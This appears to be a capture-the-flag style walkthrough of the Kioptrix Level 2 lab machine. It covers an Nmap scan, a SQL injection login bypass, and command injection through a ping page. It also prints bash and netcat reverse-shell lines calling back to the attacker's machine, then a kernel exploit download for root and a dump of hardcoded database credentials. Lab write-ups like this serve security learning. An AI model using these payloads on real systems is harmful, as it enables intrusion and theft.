Kioptrix Level 2

Lets start with the system setup now. The base system is same as used in the KioptrixLevel1 test.
HP Pavilion Notebook as my base system which has Kali linux installed in it on VMware Workstation Player 15.0. Apart from that below are the configurations:
Memory: 4 GB
Hard Disk: 80 GB
Network Adapter: NAT

And for the target machine, I have installed Kioptrix Level 2 from Vulnhub with the following setup:
Memory: 256 MB
Hard Disk: 3 GB
Network Adapter: NAT
So both the machines are running now. Let start with the reconnaissance
The IP of our Kali machine is 192.168.227.130 and our target machine has 192.168.227.129 as its IP address. Now, lets fire off Nmap and see what it brings to us. All right, so the observations from Nmap is as below:
1. Seems to be a webserver and ports 80 and 443 are open.
2. Tcp port 22 is open running OpenSSH 3.9p1 (protocol 1.99)
3. Tcp ports 111, 843 open
4. Tcp port 631 is open where we have IPP (Internet Printing Protocol) service running CUPS1.1 scheduler
5. Tcp 3306 is open which is for MySQL
Lets see what the website by navigating to http://192.168.227.129
This appears to be some sort of login page for remote administration. Lets try entering the root/root credentials to see if that works. Does not seem to be working. Upon entering the credentials, it just clears off the screen and shows us the (default) index.php.
Now, this appears to be a website built using php and we know that there is MySQL at the backend as found using Nmap, so lets try to use SQL injection to see if we can get some more information.
Lets try this: test' OR 1=1# or test' OR 1=1 -- . Note that the # and the -- (there is space after double dash) are used for commenting lines in MySQL. Looks like we have got some kind of wepage built to ping a machine. Possibly, it runs shell at the back of it. Lets try pinging the loopback address 127.0.0.1 Awesome, so we can run commands in here. Lets try to use this to run something else instead of the ping keeping the syntax intact e.g. ;pwd Brilliant !! Lets try if we can a get reverse shell from this using netcat.
Lets start netcat on the Kali machine using the command nc -nvlp 1234 ; and on the target machine, lets run the following command: ;nc 192.168.227.130 1234 -e /bin/bash But it does not look like we have got any shell with this. Kali is still listening on port 1234. Possibly Kioptrix2 does not have netcat.
That's okay. We have a much more simpler way to do this using bash.Lets try using the command: ;bash -i >& /dev/tcp/192.168.227.130/1234 0>&1
Great. Looks like we have got a shell to the target machine but we are not the root here, it is with the user "apache".
Okay, lets try and search if we can find some sort of privilege escalation here to get the root access. But before that lets do some additional recon and find some more details.
So we have found some more information. Now lets go and look for any exploits for CentOS release 4.5 with Kernel 2.6.9-55.EL.
And yes it is available in exploit-db - 9542.c
But now we need to copy the c program file into our target machine somehow. So lets use SimpleHTTPServer for that purpose. Let fire up python -m SimpleHTTPServer on our Kali machine for it to be able to serve the file as web transfer; and then we will download it from our target machine using a wget. Lets try and wget the file from target. Okay, Permission error !! Lets go to a different directory in the Kioptrix machine where the account 'apache' can write and then try to download - perhaps the /tmp directory. Done. So we have donwloaded the c file. Also confirmed on console log of the SimpleHTTPServer screen.
Now, lets just compile the c code and execute.. Awesome ! We have the root access to the Kioptrix machine now.
Lets try and test the other vulnerabilities to see if we can get find some more.

Lets check the 2 files in the /var/www/html directory There it is - a hardcoded sql id and password in the connection string. Definitely not great idea to write it like this. Lets use this and see what can we find. We will try to connect to the mysql database using these details now:
Great ! we have got the passwords for both the users - admin and john.

All right. Another writeup complete. Lets move on to the Kioptrix Level 3 machine.
See you then, keep learning !!